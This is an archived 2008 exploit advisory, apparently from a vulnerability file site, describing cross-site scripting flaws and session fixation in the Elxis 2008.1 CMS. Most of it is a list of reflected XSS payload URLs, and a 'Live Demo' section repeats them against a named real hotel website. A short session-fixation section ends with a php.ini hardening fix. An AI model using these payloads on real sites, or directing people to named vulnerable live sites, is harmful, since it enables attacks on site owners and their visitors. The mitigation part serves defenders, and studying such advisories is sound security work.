elxis-xss.txt

elxis-xss.txt: Posted Oct 14, 2008; Authored by swappie aka faithlove; Elxis 2008.1 Nemesis suffers from multiple cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | 52e5c51e245da274ad283a3c10f4b45c4b1d8cee2ed3f31a4835edc5494f2b46; Download | Favorite | View

elxis-xss.txt

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
################################################################ 
# Greetings to  --d3hydr8 -r45c4l -baltazar -sinner_01          #
#       -C1c4Tr1Z -Gabitzu and all darkc0de members            # 
;############################################################### 
# 
# Author: swappie [aka] faithlove 
# 
# Home : www.darkc0de.com
#
# Email : swappieakafaithlove@gmail.com
# 
# Do researching and share! 
# 
;############################################################### 
# 
# Title: Elxis 2008.1 Nemesis
#
# Issue Date: Monday, 29 September 2008
#
# CMS Link: http://www.elxis-downloads.com/fserver/96.html

# Vendor: http://www.elxis.org/
# 
#
;###############################################################
#
# Dork: I'm sure you can figure that by yourself, right?
#
#################################################################


----------
XSS Vulns;
----------

http://www.site.com/?>'"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php/>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>

----------
Live Demo;
----------

http://www.hotelsinalbania.net/?>'"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php/>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>


;==================================================================;
;==================================================================;

-----------------
Session Fixation;
-----------------


http://www.site.com/?PHPSESSID=[session_fixation]

Explanation:

The user's session ID could be fixed by the attacker before the user
even logs on the target server so it wouldn't be needed to get the session
ID afterwards.

How to fix the "session fixation" ?

There is a simple way to do it.

Step 1.

Open the file named php.ini from your server.

Step 2.

Look through the file for the following lines:

; This option enables administrators to make their users invulnerable to
; attacks which involve passing session ids in URLs; defaults to 0.

; session.use_only_cookies = 1    !![PLEASE NOTE THE ";"]!!


Step 3.

=> [ and make it look like this: ]

; This option enables administrators to make their users invulnerable to
; attacks which involve passing session ids in URLs; defaults to 0.

session.use_only_cookies = 1

Step 4.

Restart the web server, php, whatever.



Cheers,

swappie [aka] faithlove

Top Authors In Last 30 Days

Red Hat 216 files
Ubuntu 78 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

elxis-xss.txt

elxis-xss.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

elxis-xss.txt

Share This

elxis-xss.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems